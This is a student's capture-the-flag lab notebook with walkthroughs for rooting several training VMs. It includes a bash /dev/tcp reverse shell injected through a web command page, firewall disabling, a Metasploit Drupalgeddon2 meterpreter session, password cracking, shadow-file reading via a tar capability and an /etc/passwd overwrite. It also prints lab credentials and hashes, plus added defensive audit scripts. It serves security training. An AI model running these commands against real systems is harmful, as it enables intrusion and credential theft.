sudo dirb http://ip:8080/ -X .jsp

Next enter the command: sudo nikto -h http://ip

Open the URL http://192.168.0.26:8080/test.jsp; the page runs whatever command is typed into its box when "Get listing" is clicked.

Enter the command ls -l /home and click "Get listing". The listing reveals the username bill.

Next enter the command ssh bill@localhost ls -al ~/ and click "Get listing" (the web application's user can ssh to bill@localhost non-interactively, so no password is needed).

Enter the command ssh bill@localhost sudo ufw disable and click "Get listing", so that the host firewall does not block the reverse shell that follows.

Rocheston:~$ sudo arp-scan 192.168.0.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.26	08:00:27:07:a0:19	Cadmus Computer Systems
192.168.0.198	08:00:27:63:a8:e9	Cadmus Computer Systems


On http://192.168.0.26:8080/test.jsp, type the command below into the site's command box to get a reverse shell back to the attacking host (192.168.0.198 from the arp-scan above):
ssh bill@localhost /bin/bash -i >& /dev/tcp/192.168.0.198/4444 0>&1

Rocheston:~$ sudo nc -lvp 4444
listening on [any] 4444 ...
192.168.0.26: inverse host lookup failed: Unknown host
connect to [192.168.0.198] from (UNKNOWN) [192.168.0.26] 41110
bash: cannot set terminal process group (2915): Inappropriate ioctl for device
bash: no job control in this shell
bill@b2r:~$ sudo -l
Matching Defaults entries for bill on b2r:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL
bill@b2r:~$ sudo su
whoami
root
cd /root
ls
flag
cat flag	
flag{WellThatWasEasy}

Lab42: The aim of this exercise is to read 2 flag.txt file. One flag is located in /root/flag.txt and second flag is located in /root/eric/flag.txt.

Rocheston:~$ sudo arp-scan 192.168.0.0/24 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.25	08:00:27:07:a0:19	Cadmus Computer Systems
192.168.0.153	08:00:27:0e:2c:c6	Cadmus Computer Systems

Rocheston:~$ sudo dirb http://192.168.0.25
+ http://192.168.0.25/admin.php (CODE:200|SIZE:306)                            
+ http://192.168.0.25/index.php (CODE:200|SIZE:281)

Rocheston:~$ sudo dirb http://192.168.0.25

Rocheston:~$ sudo git clone https://github.com/internetwache/GitTools.git
Cloning into 'GitTools'...

Rocheston:~$ cd GitTools
Rocheston:~/GitTools$ ls
Dumper  Extractor  Finder  LICENSE.md  README.md
Rocheston:~/GitTools$ cd Dumper/
Rocheston:~/GitTools/Dumper$ sudo ./gitdumper.sh http://192.168.0.25/.git/ dest-dir

Rocheston:~/GitTools/Dumper$ cd ../
Rocheston:~/GitTools$ cd Extractor/
Rocheston:~/GitTools/Extractor$ sudo ./extractor.sh ../Dumper/dest-dir ./dest-dir

Rocheston:~/GitTools/Extractor$ cd dest-dir/
Rocheston:~/GitTools/Extractor/dest-dir$ ls
0-3db5628b550f5c9c9f6f663cd158374035a6eaa0
1-cc1ab96950f56d1fff0d1f006821cab6b6b0e249
2-a89a716b3c21d8f9fee38a0693afb22c75f1d31c
Rocheston:~/GitTools/Extractor/dest-dir$ cd 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/
Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ ls
admin.php  commit-meta.txt  index.php
Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ cat admin.php
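
What gitdumper and extractor do under the hood: a dumped .git directory is just loose objects, zlib-compressed blobs named by the SHA-1 of "<type> <size>\0<payload>", and walking HEAD -> ref -> commit -> tree -> blobs recovers every committed file, admin.php included, without git installed and regardless of whether the web server would serve the .php source. The code below is an added example rather than code from GitTools or the notes: a minimal reader for that on-disk format plus a constructed repository to run it against (the admin.php text in it is invented for the demo; the real file's contents were not recorded above). It handles loose objects and a symbolic or detached HEAD only; packfiles and packed-refs, which a `git gc`'d repository uses, are out of scope.

```python
"""Added example (not GitTools or the notes' code): read a dumped .git directory
from HEAD down to file contents. Loose objects only; no packfiles/packed-refs."""
import hashlib
import os
import shutil
import tempfile
import zlib


def store_object(gitdir, kind, payload):
    """Write a loose object: zlib('<kind> <size>\\0<payload>'), named by its SHA-1."""
    raw = b"%s %d\x00" % (kind.encode(), len(payload)) + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def load_object(gitdir, sha):
    """Inverse of store_object: returns (kind, payload)."""
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, payload = raw.partition(b"\x00")
    kind, _size = header.decode().split(" ")
    return kind, payload


def parse_tree(payload):
    """Tree entries are '<mode> <name>\\0<20 raw SHA-1 bytes>' back to back."""
    entries, pos = [], 0
    while pos < len(payload):
        space = payload.index(b" ", pos)
        nul = payload.index(b"\x00", space)
        entries.append((payload[pos:space].decode(), payload[space + 1:nul].decode(),
                        payload[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries


def walk_tree(gitdir, sha, prefix=""):
    """Flatten a tree to {path: bytes}, recursing into subtrees (mode 40000)."""
    kind, payload = load_object(gitdir, sha)
    if kind != "tree":
        raise ValueError("expected tree, got " + kind)
    files = {}
    for mode, name, child in parse_tree(payload):
        if mode == "40000":
            files.update(walk_tree(gitdir, child, prefix + name + "/"))
        else:
            files[prefix + name] = load_object(gitdir, child)[1]
    return files


def head_commit(gitdir):
    """Resolve HEAD, which is either 'ref: refs/heads/<branch>' or a bare hash."""
    with open(os.path.join(gitdir, "HEAD")) as f:
        head = f.read().strip()
    if not head.startswith("ref: "):
        return head
    with open(os.path.join(gitdir, head[5:])) as f:
        return f.read().strip()


def extract_commit(gitdir, sha):
    """Return (commit message, {path: bytes}) for one commit."""
    kind, payload = load_object(gitdir, sha)
    if kind != "commit":
        raise ValueError("expected commit, got " + kind)
    headers, _, message = payload.partition(b"\n\n")
    tree = [h for h in headers.split(b"\n") if h.startswith(b"tree ")][0][5:]
    return message.decode().strip(), walk_tree(gitdir, tree.decode())


def build_demo_repo(gitdir):
    """Constructed stand-in for the dumped repo: three PHP files in one commit."""
    def tree(entries):  # entries: (mode, name, sha); git stores them sorted by name
        body = b"".join(b"%s %s\x00" % (m.encode(), n.encode()) + bytes.fromhex(s)
                        for m, n, s in sorted(entries, key=lambda e: e[1]))
        return store_object(gitdir, "tree", body)
    admin = store_object(gitdir, "blob", b"<?php\n// constructed, not the real admin.php\n$pw = 'constructed-secret';\n")
    index = store_object(gitdir, "blob", b"<?php echo 'index';\n")
    config = store_object(gitdir, "blob", b"<?php\n$db = 'constructed';\n")
    root = tree([("100644", "admin.php", admin), ("100644", "index.php", index),
                 ("40000", "inc", tree([("100644", "config.php", config)]))])
    commit = store_object(gitdir, "commit", b"tree %s\nauthor A <a@x> 0 +0000\n"
                          b"committer A <a@x> 0 +0000\n\nadd admin page\n" % root.encode())
    os.makedirs(os.path.join(gitdir, "refs", "heads"))
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as f:
        f.write(commit + "\n")
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")


def demo():
    """Build the constructed repo, then recover every file reachable from HEAD."""
    gitdir = tempfile.mkdtemp()
    try:
        build_demo_repo(gitdir)
        message, files = extract_commit(gitdir, head_commit(gitdir))
        return {"message": message, "files": {p: c.decode() for p, c in files.items()}}
    finally:
        shutil.rmtree(gitdir)
```

On a dumped repository, point `head_commit`/`extract_commit` at the .git directory gitdumper wrote; to see earlier revisions (where a deleted credential often still lives) follow the `parent` header of each commit the same way. The server-side fix is to deny /.git entirely in the web server configuration, not to rely on object files being unlinked.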

Rocheston:~/GitTools/Extractor/dest-dir/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0$ cd /usr/share/webshells/php/
Rocheston:/usr/share/webshells/php$ sudo nano php-reverse-shell.php

Rocheston:/usr/share/webshells/php$ sudo nc -lvp 1234
listening on [any] 1234 ...


25/10

RCCE Lvl 2

Lab 9: The aim of this exercise is to get the root access and then catch the flag

Lab 8: The aim of this exercise is to find three hidden flags

Rocheston:~$ sudo ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.134  netmask 255.255.255.0  broadcast 192.168.5.255

Rocheston:~$ sudo arp-scan 192.168.5.1-192.168.5.200 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 200 hosts (https://github.com/royhills/arp-scan)
192.168.5.124	08:00:27:07:a0:19	Cadmus Computer Systems
192.168.5.134	08:00:27:90:01:c7	Cadmus Computer Systems

Rocheston:~$ sudo nmap -sC -sV 192.168.5.124
Ports open: 22,80

Rocheston:~$ sudo owasp-zap
We get /loot subdirectory

Rocheston:~$ cd downloads
Rocheston:~/downloads$ ls
1.jpg  2.jpg  3.jpg  4.jpg  image.jpeg
Rocheston:~/downloads$ sudo steghide extract -sf 1.jpg 
Enter passphrase: 
wrote extracted data to "secret.txt".
Rocheston:~/downloads$ sudo steghide extract -sf 2.jpg 
Enter passphrase: 
wrote extracted data to "emb.txt".
Rocheston:~/downloads$ sudo steghide extract -sf 3.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!
Rocheston:~/downloads$ sudo steghide extract -sf 4.jpg 
Enter passphrase: 
wrote extracted data to "loot.pcapng".
Rocheston:~/downloads$ sudo steghide extract -sf image.jpeg 
Enter passphrase: 
wrote extracted data to "robots.txt".

Rocheston:~/downloads$ sudo cat secret.txt 
WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=

Rocheston:~/downloads$ sudo echo "WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=" | base64 -d
You really thought it would be this easy ? Keep digging ! Lots of trolls to defeat.

Rocheston:~/downloads$ sudo cat emb.txt 
+[--->++<]>+.++[->++++<]>+.+++++++..[++>---<]>--.++[->++<]>.[--->+<]>+++.-.---------.--[--->+<]>-.+.-.--[->+++<]>-.[->+++++++<]>.++++++.---.[-->+++++<]>+++.+++[->++<]>.[-->+++<]>.+++++++++.+.+.[---->+<]>+++.+++[->++<]>.--[--->+<]>.-----------.++++++.-[--->+<]>--.-[--->++<]>-.++++++++++.+[---->+<]>+++.>+[--->++<]>.>-[----->+<]>-.++[->++<]>..----.-[--->++<]>+.-.--[++++>---<]>.-------------.-[--->+<]>+++.+[-->+<]>+++++.+.++[->+++++<]>.--.+[----->+<]>.--[++>---<]>.+[->++<]>.-[--->++<]>+.--.-[---->+++<]>-.

We go to https://www.splitbrain.org/services/ook to decipher the Brainfuck.

Deciphering it from Brainfuck to text we get: Well Done ! Your First Flag is V2hhdCBpcyBCYWx1dCA/
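
Instead of pasting the payload into a web decoder, an interpreter is a few lines and keeps the data local. The code below is an added example, not from the notes: a Brainfuck interpreter with 8-bit wrapping cells (the generated program relies on wrap-around; its very first loop counts a cell down from 1 through 255) and bracket validation, run over the emb.txt program above. The flag token it prints is itself base64, so the demo decodes that as a second step.

```python
"""Added example (not from the notes): run the Brainfuck payload from emb.txt
locally instead of pasting it into a web decoder. 8-bit wrapping cells, a tape
that grows to the right, bracket validation; PROGRAM is emb.txt verbatim."""
import base64

PROGRAM = (
    "+[--->++<]>+.++[->++++<]>+.+++++++..[++>---<]>--.++[->++<]>.[--->+<]>+++.-."
    "---------.--[--->+<]>-.+.-.--[->+++<]>-.[->+++++++<]>.++++++.---."
    "[-->+++++<]>+++.+++[->++<]>.[-->+++<]>.+++++++++.+.+.[---->+<]>+++."
    "+++[->++<]>.--[--->+<]>.-----------.++++++.-[--->+<]>--.-[--->++<]>-."
    "++++++++++.+[---->+<]>+++.>+[--->++<]>.>-[----->+<]>-.++[->++<]>..----."
    "-[--->++<]>+.-.--[++++>---<]>.-------------.-[--->+<]>+++.+[-->+<]>+++++."
    "+.++[->+++++<]>.--.+[----->+<]>.--[++>---<]>.+[->++<]>.-[--->++<]>+.--."
    "-[---->+++<]>-."
)


def match_brackets(code):
    """Map each [ to its ] and back; raise on unbalanced brackets."""
    jumps, stack = {}, []
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ] at offset %d" % i)
            start = stack.pop()
            jumps[start], jumps[i] = i, start
    if stack:
        raise ValueError("unmatched [ at offset %d" % stack[-1])
    return jumps


def run_brainfuck(code, stdin=b""):
    """Execute `code` and return its output as text (latin-1, one byte per cell)."""
    code = "".join(ch for ch in code if ch in "<>+-.,[]")  # everything else is comment
    jumps = match_brackets(code)
    tape, ptr, pc, out, inp = [0], 0, 0, bytearray(), iter(stdin)
    while pc < len(code):
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("pointer moved left of cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF   # generated programs rely on wrap-around
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)             # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return out.decode("latin-1")


def demo():
    """Decode emb.txt, then base64-decode the flag token it announces."""
    text = run_brainfuck(PROGRAM)
    flag = text.rsplit(" ", 1)[1]
    return {"text": text, "flag": flag, "decoded": base64.b64decode(flag).decode()}
```

`demo()["text"]` is the sentence quoted above and `demo()["decoded"]` is the plain text behind the base64 flag; the same `run_brainfuck` handles any other Ook/Brainfuck drop found on a box.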

Now we open loot.pcapng in Wireshark. Among the HTTP traffic there are GET and POST requests for a file download together with the file bytes. Select the HTTP stream and, in Wireshark, use File -> Export Objects -> HTTP to find and save loot.7z.

Rocheston:/pentest/password-recovery/johntheripper$ sudo ./7z2john.pl /home/rocheston/downloads/loot.7z > /home/rocheston/downloads/7zloot

Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john /home/rocheston/downloads/7zloot --wordlist:/usr/share/wordlists/rockyou.txt
manchester       (loot.7z)


Rocheston:/pentest/password-recovery/johntheripper$ sudo ./john ~/downloads/loot/id_rsa.hash --wordlist:/usr/share/wordlists/rockyou.txt
hello   (passphrase for the id_rsa extracted from loot.7z)

Rocheston:/pentest/password-recovery/johntheripper$ sudo cat ~/downloads/loot/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPf01eRsS9o4Xaaog8Acmsd8ctkNA/qweGlDVYQqfGISzy/z0Sh3a2SlEVAweLnVKz1mdoKS4LrKnKxw0cR/fe7AChdY6wq/kCodLPCPmzMZQv12RUo1awO8gpuFA4RZdSmvDmtS1220cscm0fdSDrFt2sxNfn65dgPutJg+wMgssxrExzWjp9OR6AaAlB/naarcT28/LIsMh8DeHhOd9vs/Rew6LvX0mWyLJchAzqoMPHOrSaKu/b7YbMFUlJVvrivzBy35qwOdKFuX0Fa5Wg9TWDL9B1VDu+rFV/MTMdEkss+hIvS7Nl04ovplRLSE09TVa8dPUGGzMRVTGKxHON test@mini

Last login: Tue Dec 18 01:33:12 2018 from 192.168.37.1
test@mini:~$ ls
test@mini:~$ cd .ssh
test@mini:~/.ssh$ ls -la
total 24
drwx------ 2 test test 4096 Dec  2  2018 .
drwxr-xr-x 3 test root 4096 Dec 18  2018 ..
-rw-r--r-- 1 test test  391 Dec  2  2018 authorized_keys
-rw------- 1 test test 1766 Dec  2  2018 id_rsa
-rw-r--r-- 1 test test  391 Dec  2  2018 id_rsa.pub
-rwxr-xr-x 1 test test  115 Dec  2  2018 sshscript.sh
test@mini:~/.ssh$ cat sshscript.sh 
#!/bin/bash
echo "FInally you got a shell ! Here's a flag for you  5256247262. Let's see  where you go from here"


test@mini:/var/www/html/wordpress$ cat wp-config-sample.php | more
/** MySQL database username */
define('DB_USER', 'kuya');

/** MySQL database password */
define('DB_PASSWORD', 'Chrepia##@@!!');

test@mini:/var/www/html/wordpress$ cd
test@mini:~$ ls -la
total 20
drwxr-xr-x 3 test root 4096 Dec 18  2018 .
drwxr-xr-x 4 root root 4096 Dec  2  2018 ..
-rw------- 1 test test  464 Dec 18  2018 .bash_history
drwx------ 2 test test 4096 Dec  2  2018 .ssh
-rw-r--r-- 1 test test  168 Dec  2  2018 .wget-hsts
test@mini:~$ su kaya
No passwd entry for user 'kaya'
test@mini:~$ su kuya
Password: 
kuya@mini:/home/test$ find / -perm -4000 2>/dev/null
/bin/ping
/bin/mount
/bin/su
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
kuya@mini:/home/test$ cd
kuya@mini:~$ ls
shadow.tar  who_dis.txt
kuya@mini:~$ cat who_dis.txt 
Well Done ! 

BTW this was too easy :D

Here is something for you IL0v3C@f3HaV@nA
kuya@mini:~$ cat .bash_history
cd /home/kuya
chown -R kuya
chown -R kuya /home/kiya
chown -R kuya /home/kuya
su root
cd /home/kuya
cat /etc/shadow
./tar -cvf shadow.tar /etc/shadow
tar -cvf shadow.tar /etc/shadow
which tar
getcap -r / 2>/dev/null
setcap cap_dac_read_search=ep
exit
(getcap is installed in /sbin, so /sbin and /usr/sbin must be on PATH first)
kuya@mini:~$ export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
kuya@mini:~$ getcap -r / 2>/dev/null
/bin/tar = cap_dac_read_search+ep
kuya@mini:~$ tar -cvf shadow.tar "/etc/shadow"
tar: Removing leading `/' from member names
/etc/shadow
kuya@mini:~$ tar -xvf shadow.tar
etc/shadow

kuya@mini:~$ cat etc/shadow
root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::
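
Each of these boxes gave root through one line of `sudo -l` or `getcap -r` output: mrderp's `(ALL) /home/mrderp/binaries/derpy*` (a glob under the user's own home directory, so any file named derpy-anything runs as root), bill's `NOPASSWD: ALL`, n30's `(ALL : ALL) ALL`, and here tar carrying cap_dac_read_search, which bypasses read permission checks and so hands over /etc/shadow and /root. The code below is an added example, not from the notes: a parser for both outputs with the checks an auditor would run over them. The sample outputs it runs on are the ones recorded in these notes; the risk labels are the example's own heuristics, and the home-directory test is a path-prefix check rather than a real writability check. It accepts both the `path = caps` form shown above and newer libcap's `path caps` form.

```python
"""Added example (not from the notes): audit `sudo -l` and `getcap -r /` output
for the misconfigurations that gave root on these boxes. Sample text below is
what the notes recorded; the risk labels are this example's own heuristics."""
import re

SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")
# Accepts both "path = caps" (older libcap, as above) and "path caps" (newer libcap).
CAP_LINE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>\S+)$")
DANGEROUS_CAPS = {  # capabilities that alone give a local user file or root access
    "cap_dac_read_search": "read any file (e.g. /etc/shadow, /root)",
    "cap_dac_override": "read or write any file",
    "cap_setuid": "switch to uid 0",
    "cap_sys_admin": "near-root (mounts, namespaces)",
}

# Sample inputs: the sudo -l / getcap lines recorded in these notes.
SUDO_MRDERP = """Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
"""
SUDO_BILL = """User bill may run the following commands on b2r:
    (ALL : ALL) NOPASSWD: ALL
"""
SUDO_N30 = """User n30 may run the following commands on W34KN3SS:
    (ALL : ALL) ALL
"""
GETCAP_MINI = "/bin/tar = cap_dac_read_search+ep\n"


def parse_sudo_l(output):
    """Return (runas, tags, command) for every rule after the 'may run' line."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = SUDO_RULE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
            for cmd in m.group("cmds").split(","):
                rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def assess_sudo_rule(runas, tags, cmd, home):
    """Heuristic risk labels for one rule; `home` is the user's home directory."""
    findings = []
    if cmd == "ALL":
        findings.append("any command as " + runas)
    if "NOPASSWD" in tags:
        findings.append("no password required")
    if any(c in cmd for c in "*?["):
        findings.append("glob in command path: user can create a matching file")
    if cmd.startswith(home.rstrip("/") + "/"):  # prefix check, not a writability check
        findings.append("command lives under the user's own home directory")
    return findings


def audit_sudo(output, home):
    """Map each permitted command to its findings (empty list = nothing flagged)."""
    return {cmd: assess_sudo_rule(r, t, cmd, home) for r, t, cmd in parse_sudo_l(output)}


def audit_getcap(output):
    """Map binary -> reasons for every file carrying a dangerous capability."""
    findings = {}
    for line in output.splitlines():
        m = CAP_LINE.match(line.strip())
        if not m:
            continue
        names = re.split(r"[,+=]", m.group("caps"))  # "cap_a,cap_b+ep" -> cap names
        hits = [DANGEROUS_CAPS[n] for n in names if n in DANGEROUS_CAPS]
        if hits:
            findings[m.group("path")] = hits
    return findings


def demo():
    """Run the audit over the four recorded outputs."""
    return {"mrderp": audit_sudo(SUDO_MRDERP, "/home/mrderp"),
            "bill": audit_sudo(SUDO_BILL, "/home/bill"),
            "n30": audit_sudo(SUDO_N30, "/home/n30"),
            "mini": audit_getcap(GETCAP_MINI)}
```

On a live host feed it `subprocess.run(["sudo", "-l"], ...)` and `getcap -r / 2>/dev/null` output; the same two parsers also work on text pasted from a shell log, which is how the lines above were obtained.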

kuya@mini:~$ tar cvf shadow.tar /root
tar: Removing leading `/' from member names
/root/
/root/.nano/
/root/M3m3L0rd.txt
/root/.selected_editor
/root/.bash_history
kuya@mini:~$ tar xvf shadow.tar 
root/
root/.nano/
root/M3m3L0rd.txt
root/.selected_editor
root/.bash_history
kuya@mini:~$ cd root/
kuya@mini:~/root$ ls
M3m3L0rd.txt
kuya@mini:~/root$ cat M3m3L0rd.txt 
You did it !!!!

COngratulations :D 

I just hope you had the same fun as I had while making this box.

As this is my first box, please send in your reviews to me on syed.ashhad72@gmail.com (DOn't hack this please Mr Leet)

If you are still reading, you are wasting your time

THere is no flag here.

Seriously Stop


Well I can't help so here is the last one WeasleyIsOurKing

#PeaceOut

24/10

RCCE Lvl 2

Lab 7: To get root access

Rocheston:~$ sudo ifconfig
vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.134  netmask 255.255.255.0  broadcast 192.168.5.255

Rocheston:~$ sudo arp-scan 192.168.5.100-192.168.5.200 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 101 hosts (https://github.com/royhills/arp-scan)
192.168.5.132	08:00:27:60:02:47	Cadmus Computer Systems
192.168.5.153	08:00:27:07:a0:19	Cadmus Computer Systems

Rocheston:~$ sudo nmap -sV -sC 192.168.5.153
Ports open: 22, 80, 111, 8080

Rocheston:~$ sudo msfconsole

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.5.153
rhost => 192.168.5.153

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.5.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39860 bytes) to 192.168.5.153
[*] Meterpreter session 1 opened (192.168.5.134:4444 -> 192.168.5.153:57160 ) at 2023-10-24 09:54:06 -0400

meterpreter > shell
Process 1852 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@billu-b0x:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.5 LTS
Release:	14.04
Codename:	trusty

www-data@billu-b0x:/var/www/html$ ls -la /etc/passwd

ls -la /etc/passwd
-rwxrwxrwx 1 root root 2606 Jun 10  2018 /etc/passwd

www-data@billu-b0x:/var/www/html$ cat /etc/passwd
cat /etc/passwd
indishell:$6$AunCdsxZ$OBxuMf0a/GqstthT4LEW8RGZxepGL7C3jHMk/IFyhLCTJ/.0fo/9Aa.s134i80z

Create a local passwd file and put the password hashes in it (the new hash for indishell is generated with openssl):
Rocheston:~$ sudo openssl passwd -1 -salt abc pass123
$1$abc$66P0kBoPMsKgk3H5bxZFv/
Rocheston:~$ sudo gedit passwd

Back to msfconsole,
www-data@billu-b0x:/var/www/html$ ^C
Terminate channel 0? [y/N]  y

meterpreter > cd /etc
meterpreter > upload /home/rocheston/passwd
[*] uploading  : /home/rocheston/passwd -> passwd
[*] Uploaded -1.00 B of 2.48 KiB (-0.04%): /home/rocheston/passwd -> passwd
[*] uploaded   : /home/rocheston/passwd -> passwd
meterpreter > shell
Process 2074 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@billu-b0x:/etc$ su indishell
su indishell
Password: pass123

password for indishell: pass123

indishell@billu-b0x:/etc$ sudo -i
sudo -i
root@billu-b0x:~# 

To get a proper tty shell, enter the command python -c 'import pty;pty.spawn("/bin/bash")'

lsb_release -a to identify the OS release and version

/etc/passwd is world-writable (-rwxrwxrwx), so the indishell entry can be modified easily.
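
The two weaknesses that made this box trivial (a world-writable /etc/passwd and a password hash sitting in /etc/passwd instead of behind the 'x' shadow marker) are easy to audit for. The script below is an added example, not part of the course notes or of any tool on the page: it checks the file mode and each entry, and also flags empty password fields and extra UID-0 accounts. The sample entries are constructed for the example (the indishell hash is the one printed above); the audit_passwd_file helper runs the same checks against a real file.

```python
"""Integrity checks for /etc/passwd content and permissions.

Added example, not from the course notes. It flags the weaknesses that made
billu-b0x trivial to root: a world-writable passwd file, a password hash kept
in /etc/passwd instead of behind the 'x' shadow marker, empty password fields
and extra UID-0 accounts. Sample entries are constructed; the indishell hash
is the one printed in the notes.
"""
import os
import stat

# Constructed sample: two normal entries, the weak indishell entry, an
# empty-password entry and a second UID-0 account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
indishell:$6$AunCdsxZ$OBxuMf0a/GqstthT4LEW8RGZxepGL7C3jHMk/IFyhLCTJ/.0fo/9Aa.s134i80z:1000:1000::/home/indishell:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
backup:x:0:0::/root:/bin/bash
"""


def is_shadow_marker(pw):
    """'x' means look in /etc/shadow; '*' or '!' prefixes mean locked."""
    return pw == "x" or pw.startswith(("*", "!"))


def check_mode(mode):
    """Findings for the file mode (st_mode bits). Expected is 0644, root-owned."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("passwd is group-writable")
    if mode & stat.S_IWOTH:
        findings.append("passwd is world-writable")
    if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("passwd has execute bits set")
    return findings


def check_entries(text):
    """Findings for the entries themselves (name:pw:uid:gid:gecos:home:shell)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(f"{name}: empty password field")
        elif not is_shadow_marker(pw):
            findings.append(f"{name}: password hash stored in passwd, not shadow")
        if uid == "0" and name != "root":
            findings.append(f"{name}: extra UID-0 account")
    return findings


def audit_passwd(text, mode):
    """Combine both checks; returns a list of human-readable findings."""
    return check_mode(mode) + check_entries(text)


def audit_passwd_file(path="/etc/passwd"):
    """Run the same checks against a real file on the host."""
    with open(path) as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)


if __name__ == "__main__":
    # 0o100777 is the mode 'ls -la /etc/passwd' showed on billu-b0x.
    for finding in audit_passwd(SAMPLE_PASSWD, 0o100777):
        print("FINDING:", finding)
```

On the sample the script reports six findings: three for the mode and one each for indishell, guest and backup. A clean Ubuntu host returns an empty list from audit_passwd_file().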

Lab 6: To gain root privileges and read the flag located at /root/flag.txt

vboxnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.5.134

Rocheston:~$ sudo arp-scan 192.168.0.100-192.168.5.163 -I vboxnet0
Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 1344 hosts (https://github.com/royhills/arp-scan)
192.168.5.132	08:00:27:60:02:47	Cadmus Computer Systems
192.168.5.153	08:00:27:07:a0:19	Cadmus Computer Systems

Rocheston:~$ nmap -sC -sV 192.168.5.153 -vv
PORT    STATE SERVICE REASON  VERSION
